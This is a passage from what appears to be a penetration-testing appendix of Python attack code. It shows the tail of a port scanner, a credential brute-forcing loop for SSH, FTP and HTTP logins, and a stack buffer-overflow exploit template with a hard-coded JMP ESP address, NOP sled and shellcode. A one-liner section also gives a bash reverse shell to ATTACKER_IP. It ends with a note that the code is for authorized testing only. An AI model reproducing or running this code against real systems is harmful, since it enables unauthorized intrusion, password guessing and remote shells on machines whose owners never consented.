            result = future.result()
            if result:
                results.append(result)
                port = result["port"]
                banner_text = result["banner"][:60] if result["banner"] else ""
                print(color(f"  [+] {port:>5}/tcp  open  {banner_text}", Fore.GREEN))

    elapsed = time.time() - start_time
    # Ports are reported in completion order above; the saved results are
    # sorted by port number.
    results.sort(key=lambda x: x["port"])

    print(f"\n[*] Scan complete: {len(results)} open ports "
          f"found in {elapsed:.2f}s")

    if args.output:
        output_data = {
            "target": target,
            "ip": target_ip,
            "scan_date": datetime.now().isoformat(),
            "ports_scanned": len(ports),
            "results": results,
            "elapsed_seconds": round(elapsed, 2)
        }
        # Explicit encoding keeps the report independent of the platform's
        # default locale.
        with open(args.output, "w", encoding="utf-8") as f:
            json.dump(output_data, f, indent=2)
        print(f"[*] Results saved to {args.output}")

if __name__ == "__main__":
    main()

Credential Checker Pattern

def credential_checker(target, service, cred_list):
    """Generic credential checking pattern.

    Args:
        target: Host or URL handed to the service-specific helper.
        service: One of ``"ssh"``, ``"ftp"`` or ``"http"``.
        cred_list: Iterable of ``(username, password)`` pairs, tried in
            order.

    Returns:
        tuple | None: The first ``(username, password)`` pair the helper
        accepts, or ``None`` when none succeeds. A pair whose attempt
        raises is skipped.

    Raises:
        ValueError: if ``service`` is not supported. Without this check an
            unknown service was indistinguishable from "no valid
            credentials found".
    """
    supported = ("ssh", "ftp", "http")
    if service not in supported:
        raise ValueError(
            f"unsupported service {service!r}; expected one of "
            f"{', '.join(supported)}"
        )

    for username, password in cred_list:
        try:
            if service == "ssh":
                success = try_ssh(target, username, password)
            elif service == "ftp":
                success = try_ftp(target, username, password)
            elif service == "http":
                success = try_http_login(target, username, password)
        except Exception:
            continue

        if success:
            return (username, password)

    return None

Exploit Development Pattern

import struct
import socket

def build_exploit(target_ip, target_port, shellcode):
    """Generic buffer overflow exploit template.

    Builds ``padding + return address + NOP sled + shellcode`` and sends it
    to the target over TCP. The outcome is printed; nothing is returned.

    Args:
        target_ip: Host to connect to.
        target_port: TCP port of the service.
        shellcode: Bytes appended after the NOP sled.
    """

    # Build the payload
    offset = 1024         # Offset to EIP (found via fuzzing)
    eip = struct.pack("<I", 0x625011AF)  # JMP ESP address
    nop_sled = b"\x90" * 16

    payload = b"".join((b"A" * offset, eip, nop_sled, shellcode))

    # Send the exploit
    try:
        # The context manager closes the socket on failure too, and
        # sendall() keeps writing until the whole payload is out, whereas
        # send() may transmit only part of it.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.connect((target_ip, target_port))
            sock.sendall(payload)
        print("[+] Exploit sent!")
    except Exception as e:
        print(f"[-] Exploit failed: {e}")

Quick Reference: Common One-Liners

# Reverse shell (netcat-style) — for authorized testing only
import os; os.system("bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1")

# Quick HTTP server for file transfer
# python3 -m http.server 8080

# Base64 encode/decode
import base64
# b64encode returns bytes, hence the .decode(); b64decode returns bytes too
encoded = base64.b64encode(b"payload data").decode()
decoded = base64.b64decode(encoded)

# URL encode/decode
# NOTE: this reuses the names encoded/decoded from the Base64 snippet above
from urllib.parse import quote, unquote
# quote() leaves "/" unescaped by default; pass safe="" to escape it as well
encoded = quote("param=value&foo=bar <script>")
decoded = unquote(encoded)

# Generate random strings (for tokens, filenames)
import secrets
token = secrets.token_hex(16)       # 32-char hex string
url_token = secrets.token_urlsafe(16)  # URL-safe string

# IP address manipulation
import ipaddress
network = ipaddress.ip_network("192.168.1.0/24")
# hosts() skips the network and broadcast addresses of this /24
hosts = list(network.hosts())  # All usable host IPs

# Timestamp conversion
from datetime import datetime
# fromtimestamp() without a tz argument yields a naive datetime in local time
ts = datetime.fromtimestamp(1700000000)  # Unix -> datetime
unix_ts = int(datetime.now().timestamp())  # datetime -> Unix

All code in this appendix is provided for educational purposes in authorized penetration testing and security research only. Always ensure you have proper written authorization before testing any system you do not own.